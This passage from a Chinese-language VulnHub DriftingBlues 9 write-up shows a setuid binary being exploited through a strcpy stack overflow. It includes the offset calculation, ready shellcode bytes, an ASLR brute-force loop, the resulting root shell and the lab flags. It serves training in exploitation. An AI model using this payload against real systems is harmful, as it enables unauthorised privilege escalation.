clapton\nyaraklitepe<\/code><\/pre>\n\u5207\u6362\u7528\u6237<\/h3>\n(remote) www-data@debian:\/var\/www\/html\/include$ su clapton\nPassword: \nclapton@debian:\/var\/www\/html\/include$ cd \/home clapton\nclapton@debian:\/home$ \n(local) pwncat$ \n(remote) clapton@debian:\/home$ ls -la\ntotal 12\ndrwxr-xr-x 3 root root 4096 May 9 2021 .\ndrwxr-xr-x 21 root root 4096 May 9 2021 ..\ndr-x------ 2 clapton clapton 4096 May 9 2021 clapton\n(remote) clapton@debian:\/home$ cd clapton\/\n(remote) clapton@debian:\/home\/clapton$ ls -la\ntotal 24\ndr-x------ 2 clapton clapton 4096 May 9 2021 .\ndrwxr-xr-x 3 root root 4096 May 9 2021 ..\n-rwsr-xr-x 1 root root 5150 Sep 22 2015 input\n-rwxr-xr-x 1 root root 201 May 9 2021 note.txt\n-rw-r--r-- 1 clapton clapton 32 May 9 2021 user.txt\n(remote) clapton@debian:\/home\/clapton$ cat note.txt\nbuffer overflow is the way. ( \u0361\u00b0 \u035c\u0296 \u0361\u00b0)\n\nif you're new on 32bit bof then check these:\n\nhttps:\/\/www.tenouk.com\/Bufferoverflowc\/Bufferoverflow6.html\nhttps:\/\/samsclass.info\/127\/proj\/lbuf1.htm\n\n(remote) clapton@debian:\/home\/clapton$ cat user.txt \nF569AA95FAFF65E7A290AB9ED031E04F(remote) clapton@debian:\/home\/clapton$ sudo -l\nbash: sudo: command not found\n(remote) clapton@debian:\/home\/clapton$ cd input \nbash: cd: input: Not a directory\n(remote) clapton@debian:\/home\/clapton$ file input \ninput: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter \/lib\/ld-linux.so.2, for GNU\/Linux 2.6.24, BuildID[sha1]=9e50c7cacaf5cc2c78214c81f110c88e61ad0c10, not stripped\n(remote) clapton@debian:\/home\/clapton$ \n(local) pwncat$ lpwd\n\/home\/kali\/temp\/driftingblues9\n(local) pwncat$ download input\ninput \u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501 100.0% \u2022 5.2\/5.2 KB \u2022 ? \u2022 0:00:00[06:56:26] downloaded 5.15KiB in 0.11 seconds<\/code><\/pre>\n\u5206\u6790\u7a0b\u5e8f<\/h3>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/driftingblues9]\n\u2514\u2500$ file input \ninput: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter \/lib\/ld-linux.so.2, for GNU\/Linux 2.6.24, BuildID[sha1]=9e50c7cacaf5cc2c78214c81f110c88e61ad0c10, not stripped\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/driftingblues9]\n\u2514\u2500$ checksec input \nError: No option selected. Please select an option.\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/driftingblues9]\n\u2514\u2500$ checksec --file=input\nRELRO STACK CANARY NX PIE RPATH RUNPATH Symbols FORTIFY Fortified Fortifiable FILE\nNo RELRO No canary found NX disabled No PIE No RPATH No RUNPATH 69 Symbols No 0 2 input<\/code><\/pre>\nida \u6253\u5f00\u770b\u4e00\u4e0b\uff1a<\/p>\n
# main.c\nint __cdecl main(int argc, const char **argv, const char **envp)\n{\n char dest; \/\/ [esp+11h] [ebp-9Fh]\n\n if ( argc <= 1 )\n {\n printf("Syntax: %s <input string>\\n", *argv);\n exit(0);\n }\n strcpy(&dest, argv[1]);\n return 0;\n}<\/code><\/pre>\n<\/div><\/p>\nstrcpy<\/code>\u662f\u4e00\u4e2a\u6bd4\u8f83\u8106\u5f31\u7684\u51fd\u6570\uff0c\u5e94\u8be5\u662f\u5728\u8fd9\u91cc\u8fdb\u884c\u6ea2\u51fa\uff0c\u5148\u8fd0\u884c\u4e00\u4e0b\uff1a<\/p>\n(remote) clapton@debian:\/home\/clapton$ .\/input flag\n(remote) clapton@debian:\/home\/clapton$ .\/input 1234\n(remote) clapton@debian:\/home\/clapton$ .\/input admin<\/code><\/pre>\n\u6ca1\u6709\u56de\u663e\u3002\u3002\u3002\u8fdb\u884c\u6d4b\u8bd5\uff1a<\/p>\n
(remote) clapton@debian:\/home\/clapton$ .\/input aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\nSegmentation fault<\/code><\/pre>\n\u8bf4\u660e\u53ef\u4ee5\u8fdb\u884c\u6ea2\u51fa\u3002<\/p>\n
\u68c0\u67e5ALSR<\/h4>\n(remote) clapton@debian:\/home\/clapton$ cat \/proc\/sys\/kernel\/randomize_va_space\n2<\/code><\/pre>\n\u8bf4\u660e\u542f\u7528\u4e86\u3002\u3002\u3002<\/p>\n
\u751f\u6210\u6d4b\u8bd5\u5b57\u7b26<\/h4>\n\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/driftingblues9]\n\u2514\u2500$ locate pattern_create \n\/usr\/bin\/msf-pattern_create\n\/usr\/share\/metasploit-framework\/tools\/exploit\/pattern_create.rb\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/driftingblues9]\n\u2514\u2500$ \/usr\/share\/metasploit-framework\/tools\/exploit\/pattern_create.rb -l 500\nAa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq<\/code><\/pre>\n\u6d4b\u8bd5<\/h4>\n\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/driftingblues9]\n\u2514\u2500# gdb .\/input \nGNU gdb (Debian 13.2-1) 13.2\nCopyright (C) 2023 Free Software Foundation, Inc.\nLicense GPLv3+: GNU GPL version 3 or later <http:\/\/gnu.org\/licenses\/gpl.html>\nThis is free software: you are free to change and redistribute it.\nThere is NO WARRANTY, to the extent permitted by law.\nType "show copying" and "show warranty" for details.\nThis GDB was configured as "x86_64-linux-gnu".\nType "show configuration" for configuration details.\nFor bug reporting instructions, please see:\n<https:\/\/www.gnu.org\/software\/gdb\/bugs\/>.\nFind the GDB manual and other documentation resources online at:\n <http:\/\/www.gnu.org\/software\/gdb\/documentation\/>.\n\nFor help, type "help".\nType "apropos word" to search for commands related to "word"...\nReading symbols from .\/input...\n(No debugging symbols found in .\/input)\n(gdb) run Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq\nStarting program: \/home\/kali\/temp\/driftingblues9\/input Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq\n[Thread debugging using libthread_db enabled]\nUsing host libthread_db library "\/lib\/x86_64-linux-gnu\/libthread_db.so.1".\n\nProgram received signal SIGSEGV, Segmentation fault.\n0x41376641 in ?? ()<\/code><\/pre>\n\u8ba1\u7b97\u6ea2\u51fa\u957f\u5ea6<\/h4>\n\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/driftingblues9]\n\u2514\u2500# locate pattern_offset\n\/usr\/bin\/msf-pattern_offset\n\/usr\/share\/metasploit-framework\/tools\/exploit\/pattern_offset.rb\n\n\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/driftingblues9]\n\u2514\u2500# \/usr\/share\/metasploit-framework\/tools\/exploit\/pattern_offset.rb -q 0x41376641\n[*] Exact match at offset 171<\/code><\/pre>\n\u9a8c\u8bc1<\/h4>\n\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/driftingblues9]\n\u2514\u2500# python \nPython 3.11.8 (main, Feb 7 2024, 21:52:08) [GCC 13.2.0] on linux\nType "help", "copyright", "credits" or "license" for more information.\n>>> print(171*"A"+"B"*4+80*"D")\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD<\/code><\/pre>\n\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/driftingblues9]\n\u2514\u2500# gdb .\/input\nGNU gdb (Debian 13.2-1) 13.2\nCopyright (C) 2023 Free Software Foundation, Inc.\nLicense GPLv3+: GNU GPL version 3 or later <http:\/\/gnu.org\/licenses\/gpl.html>\nThis is free software: you are free to change and redistribute it.\nThere is NO WARRANTY, to the extent permitted by law.\nType "show copying" and "show warranty" for details.\nThis GDB was configured as "x86_64-linux-gnu".\nType "show configuration" for configuration details.\nFor bug reporting instructions, please see:\n<https:\/\/www.gnu.org\/software\/gdb\/bugs\/>.\nFind the GDB manual and other documentation resources online at:\n <http:\/\/www.gnu.org\/software\/gdb\/documentation\/>.\n\nFor help, type "help".\nType "apropos word" to search for commands related to "word"...\nReading symbols from .\/input...\n(No debugging symbols found in .\/input)\n(gdb) run AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD\nStarting program: \/home\/kali\/temp\/driftingblues9\/input AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD\n[Thread debugging using libthread_db enabled]\nUsing host libthread_db library "\/lib\/x86_64-linux-gnu\/libthread_db.so.1".\n\nProgram received signal SIGSEGV, Segmentation fault.\n0x42424242 in ?? ()<\/code><\/pre>\n\u4f7f\u7528\u7f51\u4e0a\u627e\u5230\u7684payload\uff1ahttps:\/\/www.exploit-db.com\/exploits\/13357<\/a><\/p>\nchar sc[] = \n"\\x31\\xc0\\x31\\xdb\\xb0\\x06\\xcd\\x80"\n"\\x53\\x68\/tty\\x68\/dev\\x89\\xe3\\x31\\xc9\\x66\\xb9\\x12\\x27\\xb0\\x05\\xcd\\x80"\n"\\x31\\xc0\\x50\\x68\/\/sh\\x68\/bin\\x89\\xe3\\x50\\x53\\x89\\xe1\\x99\\xb0\\x0b\\xcd\\x80";\n# 55<\/code><\/pre>\npayload<\/code> 55 \u5b57\u8282\uff1a<\/p>\n\nPayload\uff1a[ NOP \/ 58] + [ shellcode \/ 55 ] + [ PAD \/ 58 ] + [ EIP ]<\/p>\n<\/blockquote>\n
\u5148\u5173\u95ed\u4e00\u4e0bkali\u7684ASLR\uff1a<\/p>\n
sudo sysctl -w kernel.randomize_va_space=0<\/code><\/pre>\n\u5728\u9776\u673a\u4e0a\u8fd0\u884c\uff1a<\/p>\n
(remote) clapton@debian:\/home\/clapton$ gdb -q input \nReading symbols from input...(no debugging symbols found)...done.\n(gdb) r $(python -c 'print("A" * 171 + "B" * 4 + "\\x90" * 64 )')\nStarting program: \/home\/clapton\/input $(python -c 'print("A" * 171 + "B" * 4 + "\\x90" * 64 )')\n\nProgram received signal SIGSEGV, Segmentation fault.\n0x42424242 in ?? ()\n(gdb) x\/s $esp\n0xbf84e7a0: '\\220' <repeats 64 times><\/code><\/pre>\n\u6784\u9020payload\uff1a<\/p>\n
r $(python -c 'print("A" * 171 + "\\xa0\\xe7\\x84\\xbf" + "\\x90" * 1000 + "\\x31\\xc9\\xf7\\xe1\\x51\\xbf\\xd0\\xd0\\x8c\\x97\\xbe\\xd0\\x9d\\x96\\x91\\xf7\\xd7\\xf7\\xd6\\x57\\x56\\x89\\xe3\\xb0\\x0b\\xcd\\x80")')<\/code><\/pre>\nfor i in {1..10000}; do (.\/input $(python -c 'print("A" * 171 + "\\xa0\\xe7\\x84\\xbf" + "\\x90" * 1000 + "\\x31\\xc9\\xf7\\xe1\\x51\\xbf\\xd0\\xd0\\x8c\\x97\\xbe\\xd0\\x9d\\x96\\x91\\xf7\\xd7\\xf7\\xd6\\x57\\x56\\x89\\xe3\\xb0\\x0b\\xcd\\x80")')) ; done<\/code><\/pre>\n\u8fd0\u884c\u62ff\u5230flag\uff1a<\/p>\n
Segmentation fault\nSegmentation fault\nSegmentation fault\nSegmentation fault\n# whoami;id\nroot\nuid=1000(clapton) gid=1000(clapton) euid=0(root) groups=1000(clapton)\n# cd \/root\n# ls -la\ntotal 16\ndrwx------ 2 root root 4096 May 9 2021 .\ndrwxr-xr-x 21 root root 4096 May 9 2021 ..\n-rw------- 1 root root 649 May 9 2021 .bash_history\n-rw-r--r-- 1 root root 295 May 9 2021 root.txt\n# cat root.txt\n\nthis is the final of driftingblues series. i hope you've learned something from them.\n\nyou can always contact me at vault13_escape_service[at]outlook.com for your questions. (mail language: english\/turkish)\n\nyour root flag:\n\n04D4C1BEC659F1AA15B7AE731CEEDD65\n\ngood luck. ( \u0361\u00b0 \u035c\u0296 \u0361\u00b0)<\/code><\/pre>\n\u545c\u545c\u545c\uff0cpwn\u7237\u624d\u662fyyds\uff0c\u4e00\u5b9a\u8981\u5b66\u4f1apwn\uff01\uff01\uff01<\/p>\n
\u53c2\u8003<\/h2>\n
https:\/\/bbs.kanxue.com\/thread-259723.htm<\/a><\/p>\nhttps:\/\/devgiants.fr\/blog\/2021\/07\/15\/drifting-blues-9-writeup\/<\/a><\/p>\nhttps:\/\/vishal-chandak.medium.com\/vulnhub-driftingblues-9-final-f39b59b3c38f<\/a><\/p>\n
![\"image-20240413183101074\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404132156943.png\")
<\/div><\/p>\n![\"image-20240413183613778\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404132156944.png\")
<\/div><\/p>\n![\"image-20240413183808228\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404132156945.png\")
<\/div><\/p>\n![\"image-20240413183839346\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404132156947.png\")
<\/div><\/p>\n![\"image-20240413184026723\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404132156948.png\")
<\/div><\/p>\n![\"image-20240413184330274\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404132156949.png\")
<\/div><\/p>\n![\"image-20240413204108420\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404132156950.png\")
<\/div><\/p>\n